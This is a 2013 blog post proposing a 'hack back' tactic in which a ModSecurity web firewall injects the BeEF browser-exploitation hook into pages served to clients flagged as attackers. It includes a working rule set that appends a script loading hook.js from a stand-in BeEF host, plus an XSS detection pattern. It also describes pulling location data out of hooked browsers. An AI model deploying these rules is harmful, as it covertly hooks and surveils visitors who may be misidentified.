Wednesday, May 8, 2013

Asymmetric Warfare - Who's Got BeEF?


Normally, when an organization responds to web-borne attacks against its websites, it responds to the malicious traffic itself: cross-site scripting (XSS) is handled with output encoding/escaping combined with some form of input validation for untrusted user input, and cross-site request forgery (CSRF) with anti-forgery tokens. It may also add protection measures such as a Content Security Policy (CSP) or Active Content Signatures (ACS) to further protect users of its applications from injected scripts, framing (click-jacking) and so on. These are of course very good steps to take and can be very effective if implemented properly.

In this post, though, I'd like to briefly discuss a slightly different approach to dealing with the attackers themselves, and how it can significantly assist in identifying them and in incident response. By combining a tool set called BeEF (Browser Exploitation Framework) with a Web Application Firewall (WAF) such as ModSecurity, you can use BeEF to hook the browsers of malicious clients that are attacking your websites (real browsers, not automated tools, since the hook is JavaScript that must execute) and get much better information for incident response investigations. It allows you to take the fight back to the attackers of your websites.

What exactly is BeEF? As mentioned above, BeEF stands for Browser Exploitation Framework. It is a penetration testing tool set (http://beefproject.com/) designed to test the exploitability of your web browser environment, and trust me when I say it does a great job of that!


I won't discuss BeEF's full attack capabilities here (you can check it out for yourself), but it is a very powerful tool to say the least. Instead of relying on an XSS vulnerability in your application as the attack vector (the usual pen-testing route), you can leverage a WAF like ModSecurity to identify malicious clients of your application and then modify the HTTP response body sent back to their requests, injecting BeEF's JavaScript hook (hook.js) into the page. Because the hook is a plain script include, it loads from the BeEF server's origin while the page itself stays on your site's origin. From that point on the attacker's browser reports back to your BeEF console for as long as the hooked page stays open, which lets you keep close tabs on the attacker and observe what they do next.

This is a much more effective tactic than trying to respond to an incident when all you have is an IP address, which is very likely not the attacker's real address because the traffic is tunnelled through proxies or other intermediary systems. BeEF contains powerful data harvesting capabilities and can pull critical details out of the attacker's browser, including details that a proxied connection hides from your logs: the browser's own view of its location rather than the exit node's. Some of the location enumeration modules (under the host folder) can be used to get physical location, including GPS coordinates and street address details, although the geolocation API prompts the user for permission, so those particular modules depend on the attacker clicking through. You can even open up a dialog prompt and communicate with the hooked browser to ask why your site is being pwned. Pretty cool.

Two practical notes. First, the injection only makes sense on HTML responses, so the WAF rule must check the response content type before appending the hook. Second, if your site sends a Content Security Policy (as recommended above), the policy must allow scripts from the BeEF server's origin, otherwise the browser will block the very hook you are trying to deliver.
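Here is what the WAF side of this looks like, as an added example that is not part of the original post or the BeEF project's own documentation. It uses ModSecurity 2.x directives that exist (SecContentInjection, the ip persistent collection, and the append action); the rule IDs, the attack signature used for flagging, the one-hour flag lifetime and the BeEF host name beef.example.com are assumptions chosen for illustration.

```apache
# Allow ModSecurity to add content to response bodies (required by append/prepend).
SecContentInjection On

# Track state per client address across requests.
# (Assumed rule IDs 900100-900102; pick IDs that fit your own rule set.)
SecAction "id:900100,phase:1,pass,nolog,initcol:ip=%{REMOTE_ADDR}"

# Flag the client as an attacker when a request carries an obvious XSS probe.
# Assumed signature for illustration; in practice use your CRS anomaly score
# or whichever rule identified the attacker.
SecRule ARGS "@rx (?i)<script" \
    "id:900101,phase:2,pass,log,msg:'Client flagged as attacker',\
     setvar:ip.attacker=1,expirevar:ip.attacker=3600"

# For flagged clients, append the BeEF hook to HTML responses only.
# The content-type check matters: append does no content-type checking itself.
SecRule IP:ATTACKER "@eq 1" \
    "id:900102,phase:4,pass,nolog,chain"
    SecRule RESPONSE_CONTENT_TYPE "@beginsWith text/html" \
        "append:'<script src=\"http://beef.example.com:3000/hook.js\"></script>'"
```

The flag lives in the ip collection, so once a client trips rule 900101 every later HTML page it fetches from the site (for the next hour, with the assumed expiry) carries the hook, not just the response to the attacking request. hook.js on port 3000 is BeEF's default hook location; adjust it to wherever your BeEF server listens, and remember to list that origin in your CSP script-src if you send one.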

MH - "Madame Hack"